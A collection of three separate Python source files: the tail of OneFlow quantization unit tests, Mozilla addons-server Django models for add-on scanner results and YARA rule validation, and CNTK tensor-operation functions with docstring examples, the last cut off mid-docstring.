test_case.assertTrue(np.allclose(out_of, out_np, rtol=1e-3))
test_case.assertTrue(np.allclose(input_diff_of, input_diff_np, rtol=1e-3))
def _run_test_fake_quantize(
test_case,
device_type,
device_num,
dtype,
in_shape,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_num)
else:
flow.config.gpu_device_num(device_num)
@flow.global_function(type="train", function_config=flow.FunctionConfig())
def QuantizeJob(
input: oft.Numpy.Placeholder(in_shape, dtype=type_name_to_flow_type[dtype])
):
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"x",
shape=in_shape,
dtype=input.dtype,
initializer=flow.zeros_initializer(input.dtype),
trainable=True,
)
input_x = input + x
flow.watch_diff(input_x, test_global_storage.Setter("input_diff"))
with flow.scope.placement(device_type, "0:0-%d" % (device_num - 1)):
scale, zero_point = flow.quantization.min_max_observer(
input_x,
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
out = flow.quantization.fake_quantization(
input_x,
scale,
zero_point,
quantization_bit,
quantization_scheme,
quantization_formula,
)
loss = flow.math.reduce_mean(out)
flow.optimizer.Adam(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]),
).minimize(loss)
return out
input = (np.random.random(in_shape) - 0.5).astype(type_name_to_np_type[dtype])
out = QuantizeJob(input).get()
input_diff = test_global_storage.Get("input_diff")
_check_fake_quantize(
test_case,
input,
input_diff.flatten(),
out.numpy().flatten(),
quantization_bit,
quantization_scheme,
quantization_formula,
per_layer_quantization,
)
@unittest.skip("This test possibly fails")
@flow.unittest.skip_unless_1n4d()
class TestMinMaxObserver(flow.unittest.TestCase):
def test_min_max_observer(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["device_num"] = [1, 4]
arg_dict["dtype"] = ["float32", "double"]
arg_dict["weight_shape"] = [(9, 40, 20, 10)]
arg_dict["quantization_bit"] = [8, 2]
arg_dict["quantization_scheme"] = ["symmetric", "affine"]
# TODO(Liang Depeng): Fix cambricon test
arg_dict["quantization_formula"] = ["google"]
arg_dict["per_layer_quantization"] = [True, False]
for arg in GenArgList(arg_dict):
if arg[-2] == "cambricon" and arg[-1] == False:
continue
_run_test_min_max_observer(*arg)
@unittest.skip("This test possibly fails")
class TestMovingAverageMinMaxObserver(flow.unittest.TestCase):
def test_moving_average_min_max_observer(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["cpu", "gpu"]
arg_dict["device_num"] = [1, 4]
arg_dict["dtype"] = ["float32", "double"]
arg_dict["activation_shape"] = [(9, 40, 20, 10)]
arg_dict["quantization_bit"] = [8, 2]
arg_dict["quantization_scheme"] = ["symmetric", "affine"]
# TODO(Liang Depeng): Fix cambricon test
arg_dict["quantization_formula"] = ["google"]
arg_dict["momentum"] = [0.95]
for arg in GenArgList(arg_dict):
_run_test_moving_average_min_max_observer(*arg)
@unittest.skip("This test possibly fails")
@flow.unittest.skip_unless_1n4d()
class TestFakeQuantize(flow.unittest.TestCase):
def test_fake_quantize(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["device_num"] = [1, 4]
arg_dict["dtype"] = ["float32", "double"]
arg_dict["in_shape"] = [(9, 40, 20, 10)]
arg_dict["quantization_bit"] = [8, 2]
arg_dict["quantization_scheme"] = ["symmetric", "affine"]
# TODO(Liang Depeng): Fix cambricon test
arg_dict["quantization_formula"] = ["google"]
arg_dict["per_layer_quantization"] = [True, False]
for arg in GenArgList(arg_dict):
if arg[-2] == "cambricon" and arg[-1] == False:
continue
_run_test_fake_quantize(*arg)
if __name__ == "__main__":
unittest.main()
|
import json
import re
from collections import defaultdict
from datetime import datetime
import yara
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext_lazy as _
from django_jsonfield_backport.models import JSONField
import olympia.core.logger
from olympia.amo.models import ModelBase
from olympia.constants.scanners import (
ABORTED,
ABORTING,
ACTIONS,
COMPLETED,
CUSTOMS,
DELAY_AUTO_APPROVAL,
DELAY_AUTO_APPROVAL_INDEFINITELY,
DELAY_AUTO_APPROVAL_INDEFINITELY_AND_RESTRICT,
FLAG_FOR_HUMAN_REVIEW,
QUERY_RULE_STATES,
MAD,
NEW,
NO_ACTION,
RESULT_STATES,
RUNNING,
SCANNERS,
SCHEDULED,
UNKNOWN,
WAT,
YARA,
)
from olympia.files.models import FileUpload
from olympia.scanners.actions import (
_delay_auto_approval,
_delay_auto_approval_indefinitely,
_delay_auto_approval_indefinitely_and_restrict,
_flag_for_human_review,
_flag_for_human_review_by_scanner,
_no_action,
)
log = olympia.core.logger.getLogger('z.scanners.models')
class AbstractScannerResult(ModelBase):
# Store the "raw" results of a scanner.
results = JSONField(default=list)
scanner = models.PositiveSmallIntegerField(choices=SCANNERS.items())
has_matches = models.BooleanField(null=True)
state = models.PositiveSmallIntegerField(
choices=RESULT_STATES.items(), null=True, blank=True, default=UNKNOWN
)
version = models.ForeignKey(
'versions.Version',
related_name='%(class)ss',
on_delete=models.CASCADE,
null=True,
)
class Meta(ModelBase.Meta):
abstract = True
indexes = [
models.Index(fields=('has_matches',)),
models.Index(fields=('state',)),
]
def add_yara_result(self, rule, tags=None, meta=None):
"""This method is used to store a Yara result."""
self.results.append({'rule': rule, 'tags': tags or [], 'meta': meta or {}})
def extract_rule_names(self):
"""This method parses the raw results and returns the (matched) rule
names. Not all scanners have rules that necessarily match."""
if self.scanner == YARA:
return sorted({result['rule'] for result in self.results})
if self.scanner == CUSTOMS and 'matchedRules' in self.results:
return self.results['matchedRules']
# We do not have support for the remaining scanners (yet).
return []
def save(self, *args, **kwargs):
rule_model = self._meta.get_field('matched_rules').related_model
matched_rules = rule_model.objects.filter(
scanner=self.scanner,
name__in=self.extract_rule_names(),
# See: https://github.com/mozilla/addons-server/issues/13143
is_active=True,
)
self.has_matches = bool(matched_rules)
# Save the instance first...
super().save(*args, **kwargs)
# ...then add the associated rules.
for scanner_rule in matched_rules:
self.matched_rules.add(scanner_rule)
def get_scanner_name(self):
return SCANNERS.get(self.scanner)
def get_pretty_results(self):
return json.dumps(self.results, indent=2)
def get_files_by_matched_rules(self):
res = defaultdict(list)
        if self.scanner == YARA:
            for item in self.results:
                res[item['rule']].append(item['meta'].get('filename', '???'))
        elif self.scanner == CUSTOMS:
scanMap = self.results.get('scanMap', {})
for filename, rules in scanMap.items():
for ruleId, data in rules.items():
if data.get('RULE_HAS_MATCHED', False):
res[ruleId].append(filename)
return res
def can_report_feedback(self):
return self.state == UNKNOWN and self.scanner not in [WAT, MAD]
def can_revert_feedback(self):
return self.state != UNKNOWN and self.scanner not in [WAT, MAD]
def get_git_repository(self):
return {
CUSTOMS: settings.CUSTOMS_GIT_REPOSITORY,
YARA: settings.YARA_GIT_REPOSITORY,
}.get(self.scanner)
@classmethod
def run_action(cls, version):
"""Try to find and execute an action for a given version, based on the
scanner results and associated rules.
If an action is found, it is run synchronously from this method, not in
a task.
"""
log.info('Checking rules and actions for version %s.', version.pk)
try:
mad_result = cls.objects.filter(version=version, scanner=MAD).get()
customs = mad_result.results.get('scanners', {}).get('customs', {})
customs_score = customs.get('score', 0.5)
customs_models_agree = customs.get('result_details', {}).get(
'models_agree', True
)
if (
customs_score <= 0.01
or customs_score >= 0.99
or not customs_models_agree
):
log.info('Flagging version %s for human review by MAD.', version.pk)
_flag_for_human_review_by_scanner(version, MAD)
except cls.DoesNotExist:
log.info('No MAD scanner result for version %s.', version.pk)
pass
rule_model = cls.matched_rules.rel.model
result_query_name = cls._meta.get_field('matched_rules').related_query_name()
rule = (
rule_model.objects.filter(
**{f'{result_query_name}__version': version, 'is_active': True}
)
.order_by(
# The `-` sign means descending order.
'-action'
)
.first()
)
if not rule:
log.info('No action to execute for version %s.', version.pk)
return
action_id = rule.action
action_name = ACTIONS.get(action_id, None)
if not action_name:
raise Exception('invalid action %s' % action_id)
ACTION_FUNCTIONS = {
NO_ACTION: _no_action,
FLAG_FOR_HUMAN_REVIEW: _flag_for_human_review,
DELAY_AUTO_APPROVAL: _delay_auto_approval,
DELAY_AUTO_APPROVAL_INDEFINITELY: _delay_auto_approval_indefinitely,
DELAY_AUTO_APPROVAL_INDEFINITELY_AND_RESTRICT: (
_delay_auto_approval_indefinitely_and_restrict
),
}
action_function = ACTION_FUNCTIONS.get(action_id, None)
if not action_function:
raise Exception('no implementation for action %s' % action_id)
# We have a valid action to execute, so let's do it!
log.info('Starting action "%s" for version %s.', action_name, version.pk)
action_function(version)
log.info('Ending action "%s" for version %s.', action_name, version.pk)
class AbstractScannerRule(ModelBase):
name = models.CharField(
max_length=200,
help_text=_('This is the exact name of the rule used by a scanner.'),
)
scanner = models.PositiveSmallIntegerField(choices=SCANNERS.items())
action = models.PositiveSmallIntegerField(
choices=ACTIONS.items(), default=NO_ACTION
)
is_active = models.BooleanField(
default=True,
help_text=_(
'When unchecked, the scanner results will not be bound to this '
'rule and the action will not be executed.'
),
)
definition = models.TextField(null=True, blank=True)
class Meta(ModelBase.Meta):
abstract = True
unique_together = ('name', 'scanner')
@classmethod
def get_yara_externals(cls):
"""
Return a dict with the various external variables we inject in every
yara rule automatically and their default values.
"""
return {
'is_json_file': False,
'is_manifest_file': False,
'is_locale_file': False,
}
def __str__(self):
return self.name
def clean(self):
if self.scanner == YARA:
self.clean_yara()
def clean_yara(self):
if not self.definition:
raise ValidationError(
{'definition': _('Yara rules should have a definition')}
)
if 'rule {}'.format(self.name) not in self.definition:
raise ValidationError(
{
'definition': _(
'The name of the rule in the definition should match '
'the name of the scanner rule'
)
}
)
if len(re.findall(r'rule\s+.+?\s+{', self.definition)) > 1:
raise ValidationError(
{'definition': _('Only one Yara rule is allowed in the definition')}
)
try:
yara.compile(source=self.definition, externals=self.get_yara_externals())
except yara.SyntaxError as syntaxError:
raise ValidationError(
{
'definition': _('The definition is not valid: %(error)s')
% {'error': syntaxError}
}
)
except Exception:
raise ValidationError(
{'definition': _('An error occurred when compiling the definition')}
)
class ScannerRule(AbstractScannerRule):
class Meta(AbstractScannerRule.Meta):
db_table = 'scanners_rules'
class ScannerResult(AbstractScannerResult):
upload = models.ForeignKey(
FileUpload,
related_name='%(class)ss', # scannerresults
on_delete=models.SET_NULL,
null=True,
)
matched_rules = models.ManyToManyField(
'ScannerRule', through='ScannerMatch', related_name='results'
)
# The value is a decimal between 0 and 1. `-1` is a special value to
# indicate an error or no score available.
score = models.DecimalField(
null=True, blank=True, max_digits=6, decimal_places=5, default=-1
)
model_version = models.CharField(max_length=30, null=True)
class Meta(AbstractScannerResult.Meta):
db_table = 'scanners_results'
constraints = [
models.UniqueConstraint(
fields=('upload', 'scanner', 'version'),
name='scanners_results_upload_id_scanner_version_id_ad9eb8a6_uniq',
)
]
class ScannerMatch(ModelBase):
result = models.ForeignKey(ScannerResult, on_delete=models.CASCADE)
rule = models.ForeignKey(ScannerRule, on_delete=models.CASCADE)
class ImproperScannerQueryRuleStateError(ValueError):
pass
class ScannerQueryRule(AbstractScannerRule):
scanner = models.PositiveSmallIntegerField(
choices=((YARA, 'yara'),), # For now code search only allows yara.
default=YARA,
)
state = models.PositiveSmallIntegerField(
choices=QUERY_RULE_STATES.items(), default=NEW
)
run_on_disabled_addons = models.BooleanField(
default=False,
help_text=_('Run this rule on add-ons that have been force-disabled as well.'),
)
celery_group_result_id = models.UUIDField(default=None, null=True)
task_count = models.PositiveIntegerField(default=0)
completed = models.DateTimeField(default=None, null=True, blank=True)
class Meta(AbstractScannerRule.Meta):
db_table = 'scanners_query_rules'
def change_state_to(self, target):
"""Immediately change state of the rule in database or raise
ImproperScannerQueryRuleStateError."""
prereqs = {
# New is the default state.
NEW: (),
# Scheduled should only happen through the admin. It's the
# prerequisite to running the task.
SCHEDULED: (NEW,),
# Running should only happen through the task, after we went
# through the admin to schedule the query.
RUNNING: (SCHEDULED,),
# Aborting can happen from various states.
ABORTING: (NEW, SCHEDULED, RUNNING),
# Aborted should only happen after aborting.
ABORTED: (ABORTING,),
# Completed should only happen through the task
COMPLETED: (RUNNING,),
}
if self.state in prereqs[target]:
props = {
'state': target,
}
if target == COMPLETED:
props['completed'] = datetime.now()
self.update(**props)
else:
raise ImproperScannerQueryRuleStateError()
def _get_completed_tasks_count(self):
if self.celery_group_result_id is not None:
from olympia.amo.celery import app as celery_app
result = celery_app.GroupResult.restore(str(self.celery_group_result_id))
if result:
return result.completed_count()
return None
def completion_rate(self):
if self.state == RUNNING:
completed_tasks_count = self._get_completed_tasks_count()
if completed_tasks_count is not None and self.task_count:
rate = (completed_tasks_count / self.task_count) * 100
return '{:.2f}%'.format(rate)
return None
class ScannerQueryResult(AbstractScannerResult):
# Has to be overridden, because the parent refers to ScannerMatch.
matched_rules = models.ManyToManyField(
'ScannerQueryRule', through='ScannerQueryMatch', related_name='results'
)
was_blocked = models.BooleanField(null=True, default=None)
class Meta(AbstractScannerResult.Meta):
db_table = 'scanners_query_results'
# FIXME indexes, unique constraints ?
class ScannerQueryMatch(ModelBase):
result = models.ForeignKey(ScannerQueryResult, on_delete=models.CASCADE)
rule = models.ForeignKey(ScannerQueryRule, on_delete=models.CASCADE)
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import numpy as np
from ..utils import wrap_numpy_arrays, get_rank
################################################################################
# convolution ops
################################################################################
################################################################################
# evaluation ops
################################################################################
def cross_entropy_with_softmax(target_vector, output_vector, name=None):
"""
This operation computes the cross entropy over the softmax of the `output_vector`.
It expects the `output_vector` as unscaled, and it computes softmax over
the `output_vector` internally. Any `output_vector` input over which softmax is
already computed before passing to this operator will be incorrect.
    :math:`cross\_entropy\_with\_softmax(t, o) = -\sum_{i \in \{1,\ldots,len(t)\}} t_i \log(softmax(o)_i)`
Example:
>>> C.eval(C.cross_entropy_with_softmax([0., 0., 0., 1.], [1., 1., 1., 50.]))
#[0.]
>>> C.eval(C.cross_entropy_with_softmax([0.35, 0.15, 0.05, 0.45], [1., 2., 3., 4.]))
#[1.84]
Args:
target_vector: usually it is one-hot vector where the hot bit corresponds to the label index. But it can be any probability distribution over the labels.
output_vector: the unscaled computed output values from the network
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import CrossEntropyWithSoftmax
op = CrossEntropyWithSoftmax(target_vector, output_vector, name = name)
wrap_numpy_arrays(op)
op.rank = 0
return op
def square_error(target_matrix, output_matrix, name=None):
"""
This operation computes the sum of the squared difference between elements
in the two input matrices. The result is a scalar (i.e., one by one matrix).
This is often used as a training criterion node.
Example:
>>> C.eval(C.square_error([4., 6.], [2., 1.]))
#[29.]
>>> C.eval(C.square_error([1., 2.], [1., 2.]))
#[0.]
Args:
target_matrix: target matrix, it is usually a one-hot vector where the hot bit corresponds to the label index
output_matrix: the output values from the network
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import SquareError
op = SquareError(target_matrix, output_matrix, name = name)
wrap_numpy_arrays(op)
op.rank = 0
return op
def error_prediction(target_vector, output_vector, name=None):
"""
This operation computes the prediction error. It finds the index of the highest
value in the output_vector and compares it to the actual ground truth label
(the index of the hot bit in the target vector). The result is a scalar
(i.e., one by one matrix). This is often used as an evaluation criterion.
It cannot be used as a training criterion though since the gradient is not
defined for it.
Example:
>>> C.eval(C.error_prediction([0., 0., 0., 1.], [1., 2., 3., 4.]))
#[0.]
>>> C.eval(C.error_prediction([0., 0., 1., 0.], [1., 2., 3., 4.]))
#[1.]
Args:
target_vector: it is one-hot vector where the hot bit corresponds to the label index
output_vector: the output values from the network
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import ErrorPrediction
op = ErrorPrediction(target_vector, output_vector, name = name)
wrap_numpy_arrays(op)
op.rank = 0
return op
################################################################################
# comparison ops
################################################################################
def less(left, right, name=None):
"""
Elementwise 'less' comparison of two tensors. Result is 1 if left < right else 0.
Example:
>>> C.eval(C.less([41., 42., 43.], [42., 42., 42.]))
[array([[1., 0., 0.]])]
        >>> C.eval(C.less([-1,0,1], [0]))
[array([[1., 0., 0.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Less
op = Less(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def equal(left, right, name=None):
"""
Elementwise 'equal' comparison of two tensors. Result is 1 if values are equal 0 otherwise.
Example:
>>> C.eval(C.equal([41., 42., 43.], [42., 42., 42.]))
[array([[0., 1., 0.]])]
        >>> C.eval(C.equal([-1,0,1], [0]))
[array([[0., 1., 0.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Equal
op = Equal(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def greater(left, right, name=None):
"""
Elementwise 'greater' comparison of two tensors. Result is 1 if left > right else 0.
Example:
>>> C.eval(C.greater([41., 42., 43.], [42., 42., 42.]))
[array([[0., 0., 1.]])]
>>> C.eval(C.greater([-1,0,1], [0]))
        [array([[0., 0., 1.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Greater
op = Greater(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def greater_equal(left, right, name=None):
"""
Elementwise 'greater equal' comparison of two tensors. Result is 1 if left >= right else 0.
Example:
>>> C.eval(C.greater_equal([41., 42., 43.], [42., 42., 42.]))
[array([[0., 1., 1.]])]
>>> C.eval(C.greater_equal([-1,0,1], [0]))
[array([[0., 1., 1.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import GreaterEqual
op = GreaterEqual(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def not_equal(left, right, name=None):
"""
Elementwise 'not equal' comparison of two tensors. Result is 1 if left != right else 0.
Example:
>>> C.eval(C.not_equal([41., 42., 43.], [42., 42., 42.]))
[array([[1., 0., 1.]])]
        >>> C.eval(C.not_equal([-1,0,1], [0]))
[array([[1., 0., 1.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import NotEqual
op = NotEqual(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def less_equal(left, right, name=None):
"""
Elementwise 'less equal' comparison of two tensors. Result is 1 if left <= right else 0.
Example:
>>> C.eval(C.less_equal([41., 42., 43.], [42., 42., 42.]))
[array([[1., 1., 0.]])]
        >>> C.eval(C.less_equal([-1,0,1], [0]))
[array([[1., 1., 0.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import LessEqual
op = LessEqual(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
################################################################################
# linear ops
################################################################################
def plus(left, right, name=None):
"""
The output of this operation is the sum of the two input tensors. It supports broadcasting.
In case of scalars its backward pass propagates the received gradient.
The operator (+) has been overloaded and can equally be used instead of plus()
Example:
>>> C.eval(C.plus([1, 2, 3], [4, 5, 6]))
[array([[ 5., 7., 9.]])]
>>> C.eval(C.plus([-5, -4, -3, -2, -1], [10]))
[array([[ 5., 6., 7., 8., 9.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Plus
op = Plus(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def minus(left, right, name=None):
"""
The output of this operation is left minus right tensor. It supports broadcasting.
In case of scalars its backward pass propagates the received gradient.
The operator (-) has been overloaded and can equally be used instead of minus()
Example:
>>> C.eval(C.minus([1, 2, 3], [4, 5, 6]))
[array([[-3., -3., -3.]])]
>>> C.eval(C.minus([[1,2],[3,4]], 1))
[array([[[ 0., 1.],
[ 2., 3.]]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Minus
op = Minus(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def element_times(left, right, name=None):
"""
The output of this operation is the element-wise product of the two input
tensors. It supports broadcasting. In case of scalars its backward pass to left propagates right
times the received gradient and vice versa.
The operator (*) has been overloaded and can equally be used instead of element_times().
Example:
>>> C.eval(C.element_times([1., 1., 1., 1.], [0.5, 0.25, 0.125, 0.]))
[array([[ 0.5 , 0.25 , 0.125, 0. ]])]
>>> C.eval(C.element_times([5., 10., 15., 30.], [2.]))
[array([[ 10., 20., 30., 60.]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import ElementTimes
op = ElementTimes(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def element_divide(left, right, name=None):
"""
The output of this operation is the element-wise division of the two input
tensors. It supports broadcasting. In case of scalars its backward pass to
    left propagates :math:`1/right` times the received gradient, and the backward
    pass to right propagates :math:`(-left/right^2)` times the received gradient.
    The operator (/) has been overloaded and can equally be used instead of element_divide().
Example:
>>> C.eval(C.element_divide([1., 1., 1., 1.], [0.5, 0.25, 0.125, 0.]))
[array([[ 2., 4., 8., 0.]])]
>>> C.eval(C.element_divide([5., 10., 15., 30.], [2.]))
[array([[ 2.5, 5. , 7.5, 15. ]])]
Args:
left: left side tensor
right: right side tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import ElementDivide
op = ElementDivide(left, right, name=name)
wrap_numpy_arrays(op)
op.rank = max(op._.rank, op.y.rank)
return op
def times(left, right, output_rank=1, name=None):
"""
The output of this operation is the matrix product of the two input matrices.
It supports broadcasting. Sparse is supported in the right operand, if it is a matrix.
The operator '@' has been overloaded such that in Python 3.5 and later X @ W equals times(X, W).
Example:
>>> C.eval(C.times([[1,2],[3,4]], [5,6]))
[array([[ 17., 39.]])]
        >>> C.eval(C.times(np.reshape(np.arange(8), (2,2,2)),np.reshape(np.arange(8), (2,2,2)), output_rank=1))
[array([[[ 28., 34.],
[ 76., 98.]]])]
        >>> C.eval(C.times(np.reshape(np.arange(8), (2,2,2)),np.reshape(np.arange(8), (2,2,2)), output_rank=2))
[array([[[[[ 4., 5.],
[ 6., 7.]],
[[ 12., 17.],
[ 22., 27.]]],
[[[ 20., 29.],
[ 38., 47.]],
[[ 28., 41.],
[ 54., 67.]]]]])]
Args:
left: left side matrix or tensor
right: right side matrix or tensor
output_rank (int): in case we have tensors as arguments, output_rank represents
the number of axes to be collapsed in order to transform the tensors
into matrices, perform the operation and then reshape back (explode the axes)
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Times
# CNTK uses column vectors and column major representation, thus we reverse
# params
op = Times(right, left, outputRank=output_rank, name=name)
wrap_numpy_arrays(op)
op.rank = op.x.rank + op.y.rank - 2
return op
def identity(x, name=None):
"""
The identity function. It returns a tensor identical to the input tensor `x`:
:math:`identity(x) = x`
Example:
>>> C.eval(C.identity([0., 1.]))
[array([[ 0. , 1.]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Identity
op = Identity(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
################################################################################
# non_diff ops
################################################################################
def floor(arg, name=None):
"""
The output of this operation is the element-wise value rounded to the largest
integer less than or equal to the input.
Example:
>>> C.eval(C.floor([0.2, 1.3, 4., 5.5, 0.0]))
[array([[ 0., 1., 4., 5., 0.]])]
>>> C.eval(C.floor([[0.6, 3.3], [1.9, 5.6]]))
[array([[[ 0., 3.],
[ 1., 5.]]])]
>>> C.eval(C.floor([-5.5, -4.2, -3., -0.7, 0]))
[array([[-6., -5., -3., -1., 0.]])]
>>> C.eval(C.floor([[-0.6, -4.3], [1.9, -3.2]]))
[array([[[-1., -5.],
[ 1., -4.]]])]
Args:
arg: input tensor
name (str): the name of the node in the network (optional)
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Floor
op = Floor(arg, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def ceil(arg, name=None):
"""
The output of this operation is the element-wise value rounded to the smallest
integer greater than or equal to the input.
Example:
>>> C.eval(C.ceil([0.2, 1.3, 4., 5.5, 0.0]))
[array([[ 1., 2., 4., 6., 0.]])]
>>> C.eval(C.ceil([[0.6, 3.3], [1.9, 5.6]]))
[array([[[ 1., 4.],
[ 2., 6.]]])]
Args:
arg: input tensor
name (str): the name of the node in the network (optional)
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Ceil
op = Ceil(arg, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def round(arg, name=None):
"""
The output of this operation is the element-wise value rounded to the nearest integer.
In case of a tie, i.e. when an element has an exact fractional part of 0.5,
this operation follows the "round half-up" tie-breaking strategy.
This is different from NumPy's round operation, which follows
the "round half to even" strategy.
Example:
>>> C.eval(C.round([0.2, 1.3, 4., 5.5, 0.0]))
[array([[ 0., 1., 4., 6., 0.]])]
>>> C.eval(C.round([[0.6, 3.3], [1.9, 5.6]]))
[array([[[ 1., 3.],
[ 2., 6.]]])]
>>> C.eval(C.round([-5.5, -4.2, -3., -0.7, 0]))
[array([[-5., -4., -3., -1., 0.]])]
>>> C.eval(C.round([[-0.6, -4.3], [1.9, -3.2]]))
[array([[[-1., -4.],
[ 2., -3.]]])]
Args:
arg: input tensor
name (str): the name of the node in the network (optional)
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Round
op = Round(arg, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
################################################################################
# non_linear and nn ops
################################################################################
def clip(x, min_value, max_value, name=None):
"""
Computes a tensor with all of its values clipped to fall
between `min_value` and `max_value`, i.e.
``min(max(x, min_value), max_value)``.
The output tensor has the same shape as `x`.
The backward pass propagates the received gradient if no clipping occurred,
and 0 if the value was clipped.
Example:
>>> C.eval(C.clip([1., 2.1, 3.0, 4.1], 2., 4.))
[array([[ 2. , 2.1, 3. , 4. ]])]
>>> C.eval(C.clip([-10., -5., 0., 5., 10.], [-5., -4., 0., 3., 5.], [5., 4., 1., 4., 9.]))
[array([[-5., -4., 0., 4., 9.]])]
Args:
x: tensor to be clipped
min_value: a scalar or a tensor which represents the minimum value to clip element values to
max_value: a scalar or a tensor which represents the maximum value to clip element values to
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Clip
op = Clip(x, min_value, max_value, name = name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def relu(x, name=None):
"""
Rectified linear operation. Computes the element-wise rectified linear
of `x`: ``max(x, 0)``
The output tensor has the same shape as `x`.
Example:
>>> C.eval(C.relu([[-1, -0.5, 0, 1, 2]]))
[array([[[ 0., 0., 0., 1., 2.]]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Relu
op = Relu(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def sigmoid(x, name=None):
"""
Computes the element-wise sigmoid of `x`:
:math:`sigmoid(x) = {1 \over {1+\exp(-x)}}`
The output tensor has the same shape as `x`.
Example:
>>> C.eval(C.sigmoid([-2, -1., 0., 1., 2.]))
[array([[ 0.119203, 0.268941, 0.5 , 0.731059, 0.880797]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Sigmoid
op = Sigmoid(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def tanh(x, name=None):
"""
Computes the element-wise tanh of `x`:
The output tensor has the same shape as `x`.
Example:
>>> C.eval(C.tanh([[1,2],[3,4]]))
[array([[[ 0.761594, 0.964028],
[ 0.995055, 0.999329]]])]
Args:
x: numpy array or any :class:`cntk.graph.ComputationNode` that outputs a tensor
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk2 import Tanh
op = Tanh(x, name=name)
wrap_numpy_arrays(op)
op.rank = op._.rank
return op
def softmax(x, name=None):
"""
Squashes the input values `x` such that they add up to 1:
:math:`softmax(x_i) = {\exp(x_i - \max_{x_j \in x} x_j) \over {\sum_{x_j \in x} \exp(x_j - \max_{x_k \in x} x_k)}}`
The maximum value :math:`\max_{x_j \in x} x_j` is subtracted from every element
before exponentiation for numerical stability.
Example:
>>> C.eval(C.softmax([[1, 1, 2, 3]]))
[array([[[ 0.082595, 0.082595, 0.224515, 0.610296]]])]
>>> C.eval(C.softmax([1, 1]))
